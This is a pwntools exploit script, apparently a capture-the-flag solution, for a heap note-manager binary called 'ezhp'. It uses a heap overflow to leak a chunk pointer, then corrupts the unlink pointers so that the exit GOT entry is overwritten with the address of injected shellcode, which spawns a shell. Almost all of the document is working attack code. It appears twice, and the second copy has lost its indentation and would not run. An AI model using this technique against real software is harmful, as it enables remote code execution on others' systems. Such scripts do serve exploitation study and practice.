ocean1/ezhp.py

## ezhp.py
from pwn import *
context(arch='i386', os='linux', log_level="info")

HOST = args.get('HOST', "localhost")
PORT = 4000

got_exit = 0x804A010

# account in the shellcode that when we overwrite prev/next
# it may overwrite part of the shellcode, we want to jump over
sc = asm("jmp $+14") + "A" * 12 + asm(shellcraft.sh())

log.debug(disasm(sc))

f_hchunk = "<III"


def create_note(size):
    r.sendline("1")
    r.sendline("%d" % size)
    r.recvuntil("option.\n")


def modify_note(id, size, content):
    r.sendline("3")
    r.sendline("%d" % id)
    r.sendline("%d" % size)
    r.recvuntil("your data.")
    r.sendline("%s" % content)
    r.recvuntil("option.")


def print_note(id):
    # leak out the pointer to the previous chunk
    r.sendline("4")
    r.recvuntil("id.\n")
    r.sendline("%d" % id)
    return r.recvuntil("option.")


def remove_note(id):
    r.sendline("2")
    r.sendline("%d" % id)
    r.recvuntil("option.\n")


with process(HOST) if HOST.startswith("./") \
        else remote(HOST, PORT, timeout=0.5) as r:

    create_note(len(sc))    # add note 0
    create_note(16)         # add note 1

    size = len(sc)
    alloc_size = size + 12 - (size + 12) % 12 + 12
    pad_size = alloc_size - size - 12

    # modify size 0 to overwrite note2
    # overwrite also the size getting over the size allocated
    padding = "A" * pad_size
    modify_note(0, 100, flat(sc, padding, "AAA"))
    # only overwrite 3 bytes for size
    # since there is a \n to account for

    out = print_note(0)
    _hp = (len(sc) + pad_size)
    # we will receive the header struct after the shellcode at least
    (s, n, p) = struct.unpack_from(f_hchunk, out, _hp)

    log.info(
        "leak chunk for note 1: (%s, %s, %s)" % (hex(s), hex(n), hex(p))
    )

    sc_addr = p + 12  # add size of the header

    # now overwrite again and overwrite next and prev pointer
    modify_note(0, 100, flat(
        sc, padding, "AAAA", p32(got_exit),  # overwrite next
        p32(sc_addr)  # overwrite prev
    ))

    # free -> list unlink -> overwrite prev pointer which points to got with
    # pointer to the shellcode
    remove_note(1)

    # call exit()
    r.send("6\n")
    r.interactive()
	from pwn import *
	context(arch='i386', os='linux', log_level="info")

	HOST = args.get('HOST', "localhost")
	PORT = 4000

	got_exit = 0x804A010

	# account in the shellcode that when we overwrite prev/next
	# it may overwrite part of the shellcode, we want to jump over
	sc = asm("jmp $+14") + "A" * 12 + asm(shellcraft.sh())

	log.debug(disasm(sc))

	f_hchunk = "<III"


	def create_note(size):
	r.sendline("1")
	r.sendline("%d" % size)
	r.recvuntil("option.\n")


	def modify_note(id, size, content):
	r.sendline("3")
	r.sendline("%d" % id)
	r.sendline("%d" % size)
	r.recvuntil("your data.")
	r.sendline("%s" % content)
	r.recvuntil("option.")


	def print_note(id):
	# leak out the pointer to the previous chunk
	r.sendline("4")
	r.recvuntil("id.\n")
	r.sendline("%d" % id)
	return r.recvuntil("option.")


	def remove_note(id):
	r.sendline("2")
	r.sendline("%d" % id)
	r.recvuntil("option.\n")


	with process(HOST) if HOST.startswith("./") \
	else remote(HOST, PORT, timeout=0.5) as r:

	create_note(len(sc)) # add note 0
	create_note(16) # add note 1

	size = len(sc)
	alloc_size = size + 12 - (size + 12) % 12 + 12
	pad_size = alloc_size - size - 12

	# modify size 0 to overwrite note2
	# overwrite also the size getting over the size allocated
	padding = "A" * pad_size
	modify_note(0, 100, flat(sc, padding, "AAA"))
	# only overwrite 3 bytes for size
	# since there is a \n to account for

	out = print_note(0)
	_hp = (len(sc) + pad_size)
	# we will receive the header struct after the shellcode at least
	(s, n, p) = struct.unpack_from(f_hchunk, out, _hp)

	log.info(
	"leak chunk for note 1: (%s, %s, %s)" % (hex(s), hex(n), hex(p))
	)

	sc_addr = p + 12 # add size of the header

	# now overwrite again and overwrite next and prev pointer
	modify_note(0, 100, flat(
	sc, padding, "AAAA", p32(got_exit), # overwrite next
	p32(sc_addr) # overwrite prev
	))

	# free -> list unlink -> overwrite prev pointer which points to got with
	# pointer to the shellcode
	remove_note(1)

	# call exit()
	r.send("6\n")
	r.interactive()